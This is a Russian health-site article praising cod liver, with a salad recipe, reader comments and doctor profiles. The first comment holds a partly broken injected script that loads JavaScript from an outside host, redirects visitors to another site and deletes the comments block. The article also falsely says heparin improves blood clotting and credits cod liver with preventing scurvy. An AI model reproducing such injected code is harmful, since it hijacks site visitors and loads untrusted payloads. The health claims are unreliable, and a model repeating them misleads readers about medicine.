Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Тощая рыба с жирной печен...  >>  Тощая рыба с жирной печенью
 
Обратная связь
 

Тощая рыба с жирной печенью

Размер шрифта
28 октября 2011 07:00
  • google_analytics: false
  • Нравится

Скандинавские морские разбойники – викинги – верили, что печень трески помогает видеть в темноте. Это не так, ночное зрение треска не улучшает. Но полезного в ней действительно немало.

Печень трески

Мы уже рассказывали о полезных свойствах трески, когда говорили о рыбьем жире. Жаль только, что вкусным этот продукт не назовешь. Зато можно приготовить много блюд из печени этой рыбы.

     Чем же богата печень трески ?

  1. Весь жир у тощей трески накапливается в печени. В жире очень много витаминов A и D. Для сравнения – в 100 граммах говядины 4 микрограмма витамина D. А в 100 граммах печени трески – целых 100!

  2. Витамины A и D хороши для укрепления костей, для здоровья кожи и профилактики заболеваний глаз. Вообще, треска – рыба северная, и первыми с ней «познакомились» северные народы, такие как лапландцы, эскимосы и наши соотечественники – архангельские поморы. Так вот, север небогат овощами и фруктами (в районах традиционного проживания эскимосов они вовсе не растут ни в каком виде), и тем не менее, цингой северные народы не болеют. В том числе благодаря печени трески.

Для профилактики каких болезней она полезна?
  1. Помимо витаминов, в печени трески есть особое вещество – гепарин, оно улучшает свертываемость крови и помогает профилактике сердечно-сосудистых заболеваний. Свою роль играют и Омега-3 жирные кислоты, которых в рыбьей печени полно. Они не дают «плохому» холестерину откладываться в сосудах и образовывать бляшки.

  2. Кстати Омега-3 – это именно то вещество, которое входит в состав серых клеток мозга и несет ответственность за передачу импульсов между клетками мозга. Если этого вещества не хватает, процесс обмена информации в мозге идет хуже, развиваются различные заболевания, вроде болезни Альцгеймера. Таким образом, печень трески способствует и ее профилактике тоже.

  3. Печень трески – очень жирный продукт. Злоупотреблять им не стоит, особенно людям с низким давлением. Четких рекомендаций тут нет, и если хотите точно узнать, сколько печени трески вам можно, спросите у диетолога.

Приятного аппетита!

И напоследок, попробуйте наш рецепт салата из печени трески:

 1

Вам понадобятся:

  • Банка печени трески в масле
  • 4 сваренных вкрутую яйца
  • Огурец
  • Свежая зелень
  • Молотый черный перец и лимонный сок
  • 4 помидора

Нарежьте вареные яйца и огурец кубиками. Из банки с печенью трески слейте жидкость и тщательно перемешайте с яйцами и огурцом. Получившейся смеси дайте отстояться в холодильнике около часа и приправьте зеленью, перцем и лимонным соком. Помидоры разрежьте и выньте середину, чтобы получились импровизированные чашки. В них и положите по ложке салата, после чего блюдо можно подавать на стол.

Но прежде чем готовить по нашему рецепту – внимательно изучите банку. Покупать стоит только ту печень трески, которую изготовили непосредственно в местах ее обитания: в Архангельской и Мурманской областях. А о том, что эта печень высшего качества, скажет штамп «Выработано в море».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - sherozia

08 апреля 2016 в 20:10

Цитировать   |   Пожаловаться

Обожаю бутерброды с печенью трески. Она вот еще оказывается какая полезная.

Статьи

       
Как заботиться о печени   Лечение гепатита С   Лечение гепатита А   Эндоскопическая ретроградная холангиопанкреатография (ЭРХПГ)  

Слайдшоу

Самые сумасшедшие факты о печени Что выпить и съесть для печени
Мифы о похмелье Простые шаги к здоровью печени
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.